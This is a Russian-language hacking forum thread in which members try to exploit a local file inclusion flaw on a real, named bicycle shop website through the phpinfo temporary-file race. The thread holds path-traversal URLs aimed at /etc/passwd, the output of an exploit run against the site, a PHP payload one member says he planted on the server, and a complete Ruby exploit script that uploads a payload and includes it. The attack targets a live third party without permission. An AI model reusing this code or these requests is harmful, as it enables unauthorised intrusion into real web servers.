Помогите с LFI через phpinfo

Discussion in 'Уязвимости' started by psihoz26, 19 Sep 2013.

  1. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    ссылка на пхпинфо
    http://www.cloud9(АНТИГУГОЛ)cycles.com/info.php

    ссылка с инклудом
    http://www.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../etc/passwd%00

    юзаю слоит LFI через phpinfo
    взятый отсюда
    https://rdot.org/forum/showpost.php?p=12621&postcount=2



    Code:
    C:\Windows\system32>perl C:\lfi.pl http://www.cloud9(АНТИГУГОЛ)cycles.com/info.php http://w
    ww.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../etc/passwd%00
    Generating huge headers         [headers ready]
    Setting buffer size             [512]
    Sending request                 [request sent]
    HTTP/1.1 200 OK
    Reading.........................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ......................................
    Got filename: /tmp/phpROHVzd
    Including...
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
    <html>
            <head>
                    <title>Cloud 9 Cycles</title>
                    <meta http-equiv="content-type" content="text/html; charset=utf-
    8">
                    <meta http-equiv="Content-Script-Type" content="text/javascript"
    />
                    <meta name="description" content="" />
                    <script type="text/javascript">
                            <!--
                                    if (top.location!= self.location) {
                                            top.location = self.location.href
                                    }
                            //-->
                    </script>
                    <script type="text/javascript" src="fx/js/jquery-1.3.2.js"></scr
    ipt>
                    <script type="text/javascript" src="fx/js/jquery.easing.1.3.js">
    </script>
                    <script type="text/javascript" src="fx/js/jquery.fancybox-1.3.1.
    pack.js"></script>
                    <script type="text/javascript" src="fx/js/pngfix.js"></script>
                    <script type="text/javascript" src="fx/js/skrypty.js"></script>
    
    
    
                    <link href="fx/css/jquery.fancybox-1.3.1.css" type="text/css" re
    l="stylesheet" media="screen" />
                <link href="fx/css/main.css" type="text/css" rel="stylesheet" />
            </head>
            <body class="avant" style="background: url(fx/gfx/bg/../../../../../../t
    mp/phpROHVzd .jpg) center no-repeat #000 fixed ">
    
    
    
                    <div id="kontener">
                            <div id="top">
                            <div style="position: relative; top: 8px; left: 15px">
            <a href="http://www.facebook.com/pages/Cloud-9-Cycles/158029180960878"><
    img style="margin: 0px 10px 0 0px;" src="fx/gfx/fb.gif"></a>
            <a href="http://twitter.com/#!/Cloud9cycles"><img style="margin: 0px 520
    px 0 0px;" src="fx/gfx/tw.gif"></a>
                                    <a href="https://twitter.com/Cloud9Cycles" class
    ="twitter-follow-button"  data-width="230px" data-button="grey" data-text-color=
    "#FFFFFF" data-link-color="#00AEFF">Follow @Cloud9Cycles</a>
            <script src="//platform.twitter.com/widgets.js" type="text/javascript"><
    /script>
            <iframe src="//www.facebook.com/plugins/like.php?href=http://www.faceboo
    k.com/pages/Cloud-9-Cycles/158029180960878&amp;send=false&amp;layout=button_coun
    t&amp;width=450&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;f
    ont&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:h
    idden; width:85px; height:21px;" allowTransparency="true"></iframe>
             <div class="clear"></div>
    
                            </div>
            <a href="index.php?content=home" title="Back to home page"><img src="fx/
    gfx/logo.png" alt="Cloud9Cycles logo"></a>
    
                                    <div id="baner-menu-box">
                                            <div id="baner-top" ></div>
                                            <div id="menu">
                                                    <span>
                                                            <a href="index.php"
                                     title="Back to home page"         onmouseover="
    this.style.color='#fff'"        onmouseout="this.style.color='#000'">home</a>  -
    -
                                                            <a href="index.php?conte
    nt=custom"       title="Custom builds"               onmouseover="this.style.col
    or='#fff'"      onmouseout="this.style.color='#000'">custom builds</a>  --
                                                            <a href="index.php?conte
    nt=bikes"          title="Browse our Bikes"          onmouseover="this.style.col
    or='#fff'"      onmouseout="this.style.color='#000'">bikes</a>  --
                                                            <a href="index.php?conte
    nt=service"  title="Servicing"                         onmouseover="this.style.c
    olor='#fff'"    onmouseout="this.style.color='#000'">servicing</a>  --
                                                            <a href="index.php?conte
    nt=rent"           title="Rent a bike"                     onmouseover="this.sty
    le.color='#fff'"        onmouseout="this.style.color='#000'">bike rental</a>  --
    
                                                            <a href="http://www.clou
    d9cycles.blogspot.com"           title="Cloud 9 Cycles blog"     onmouseover="th
    is.style.color='#fff'"  onmouseout="this.style.color='#000'">blog</a>  --
                                                            <a href="index.php?conte
    nt=contact"  title="Contact us"                        onmouseover="this.style.c
    olor='#fff'"    onmouseout="this.style.color='#000'">contact us</a>
                                                    </span>
                                            </div>
                                            <div id="baner-bottom" ></div>
                                                                            </div>
                            </div>
                            <div class="clear"></div>
    
                            <div id="content">
                                    hello<br>
    
    Keeping file /tmp/phpROHVzd in tmp, use it as long as you need it
    ...............................................................................

    патаюсь проинклудить /tmp/phpROHVzd

    http://www.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../tmp/phpROHVzd%00

    и ничего не ывходит =(
    В чем может быть проблема??
     
  2. yobanet

    yobanet New Member

    Joined:
    22 Jul 2013
    Messages:
    5
    Likes Received:
    1
    Reputations:
    5
    Все работает, правда файл в /tmp/ живет не долго.
    У меня самописный сплоит под phpinfo, в качестве нагрузки добавил в него: <?php file_put_contents('/tmp/qwerty.lol','<?php phpinfo(); ?>'); ?>

    Результат:

    http://www.cloud(дщд)9cycles.com/index.php?content=../../../../../../tmp/qwerty.lol%00
     
    1 person likes this.
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    не силён в перое, но кто может обьяснить какие манипуляции позволяют создать файл в папке темп?
     
  4. yobanet

    yobanet New Member

    Joined:
    22 Jul 2013
    Messages:
    5
    Likes Received:
    1
    Reputations:
    5
    Манипуляции по созданию файлов в /tmp выполняет phpinfo(), достаточно передать скрипту содержимое файлов, как то так.
     
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    ммм, а подробнее кто-то может обьяснить? какие параметры нужно передавать?
     
  6. yobanet

    yobanet New Member

    Joined:
    22 Jul 2013
    Messages:
    5
    Likes Received:
    1
    Reputations:
    5
    Как то так, не знаю как объяснить.

    Code:
    require 'socket'
    require 'uri'
    require 'net/http'
    
    def main()
    
    	#setting up
    	puts "SETTING UP"
    	
    	target = 'http://www/phpinfo.php'										# phpinfo()
    	lfi = 'http://www/include.php?file='									# LFI template like http://www.host.com/data/lfi.php?location={LFI}
    	payloadLocation = 'payload.txt'											# payload
    	junkFilesCount = 50														# tail
    	recvBufferSize = 1024													# receive buffer size
    
    	# just echo for u
    	printDotted(' -target:')
    	print("[#{target}]\n");
    	
    	printDotted(' -lfi:')
    	print("[#{lfi}]\n");
    	
    	printDotted(' -payload:')
    	print("[#{payloadLocation}]\n");
    	
    	printDotted(' -junk files count:')
    	print("[#{junkFilesCount}]\n");
    	
    	printDotted(' -receive buffer size:')
    	print("[#{recvBufferSize}]\n");
    	
    	# try to load payload
    	begin
    		printDotted('LOAD PAYLOAD')
    		payload = IO.read(payloadLocation)
    		print("[OK]\n")
    	rescue
    		print("[ERROR]\n")
    		return
    	end
    
    	# payload
        file = "-----------------------------89q8834898293409rw29\r\n"
        file += "Content-Disposition: form-data; name=\"file_loader\"; filename=\"\r\npayload.txt\"\r\n"
        file += "Content-Type: text/plain\r\n\r\n"
        file += "#{payload}\r\n"
        file += "-----------------------------89q8834898293409rw29\r\n"
    			
        # generate junk files
    	printDotted('PREPARE JUNK')
    	
    	curJunkFiles = 0;
    	
    	for junkFiles in 0..junkFilesCount
    		file += "-----------------------------89q8834898293409rw29\r\n"
    		file += "Content-Disposition: form-data; name=\"file" + rand(10000).to_s + "\"; filename=\"\r\njunk" + rand(1000000).to_s * 10000 + ".txt\"\r\n"
    		file += "Content-Type: text/plain\r\n\r\n"
    		file += "superslow\r\n"
    		file += "-----------------------------89q8834898293409rw29\r\n"
    	end
    	
    	print("[OK]\n")
    	
    	printDotted('prepare headers')
    	
    	targetURI = URI(target)
    	
    	query = targetURI.path
    	
    	# add query if not empty
    	if !targetURI.query.nil?
    		query += '?' + targetURI.query
    	end
    	
    	# headers
    	req = "POST #{query} HTTP/1.0\r\n"
    	req += "Content-Type: multipart/form-data; boundary=---------------------------89q8834898293409rw29\r\n"
    	req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    	req += "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\r\n"
    	req += "Host: #{targetURI.host}\r\n"
    	req += "Content-Length: #{file.length}\r\n"
    	req += "Connection: Close\r\n\r\n"
    	
    	req += file
    	
    	print("[OK]\n")
    
    	# create tcp socket	
    	sock = Socket.new(:INET, :STREAM)
    	
    	# and set receive buffer size
    	sock.setsockopt(Socket::SOL_SOCKET, Socket::SO_RCVBUF, recvBufferSize)	
    	
    	printDotted('connecting to')
    	
    	begin
    		sock.connect(Socket.pack_sockaddr_in(80, targetURI.host))
    	rescue
    		print("[ERROR]\n")
    		return false
    	end
    	
    	print("[OK]\n")
    
    	sock.write(req)
    	
    	data = ''
    	payloadFound = false
    	loaderFound = false
    	payloadFileName = ''
    	loaderFileName = ''
    	
    	while true
    		
    		printDotted("get next #{recvBufferSize} bytes")
    		
    		tmpData = sock.recv(recvBufferSize)
    		
    		print("[OK]\n")
    		
    		if tmpData.nil?
    			break
    		end
    		
    		data += tmpData
    		
    		tmpFileName = data.scan(/\[name\]\s=&gt;\spayload.txt\n\s\s\s\s\[type\]\s=&gt;\stext\/plain\n\s\s\s\s\[tmp_name\]\s=&gt;\s(.*?)\n\s\s\s\s\[error\]/)
    		
    		if tmpFileName.length > 0
    			payloadFound = true
    			payloadFileName = tmpFileName[0][0].clone
    			
    			printDotted('payload file location:')
    			print('[' + payloadFileName + ']' + "\n")
    			
    			lfi += payloadFileName + '%00'
    					
    			lfiURI = URI(lfi)
    	
    			printDotted("Include #{payloadFileName}")
    			
    			response = Net::HTTP.get_response(lfiURI);
    	
    			if !response.is_a?(Net::HTTPOK) then 
    				print("[ERROR]\n")
    				return
    			else
    				print("[OK]\n")
    			end			
    			
    			return
    		end
    		
    	end
    end
    
    def printDotted(msg)
    	print msg + "." * (50 - msg.length)
    end
    
    main()
    
     
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    Как тесен интернет то.
     
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75

    вопрос актуален
     
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    лол ))) как же ты писал сплоит, если не знаешь как работает уязвимость? :D
     
    _________________________
  10. wacky

    wacky Member

    Joined:
    30 Jan 2012
    Messages:
    42
    Likes Received:
    7
    Reputations:
    6
    Это не phpinfo() выполняет подобные "манипуляции", а интерпретатор, пхпинфо же служит связующим звеном, позволяющим при определенных обстоятельствах увидеть путь к временному файлу.
     
  11. yobanet

    yobanet New Member

    Joined:
    22 Jul 2013
    Messages:
    5
    Likes Received:
    1
    Reputations:
    5
    Я сказал что я не могу грамотно объяснить, а не про то, что я не знаю как работает уязвимость. ;)
     
Loading...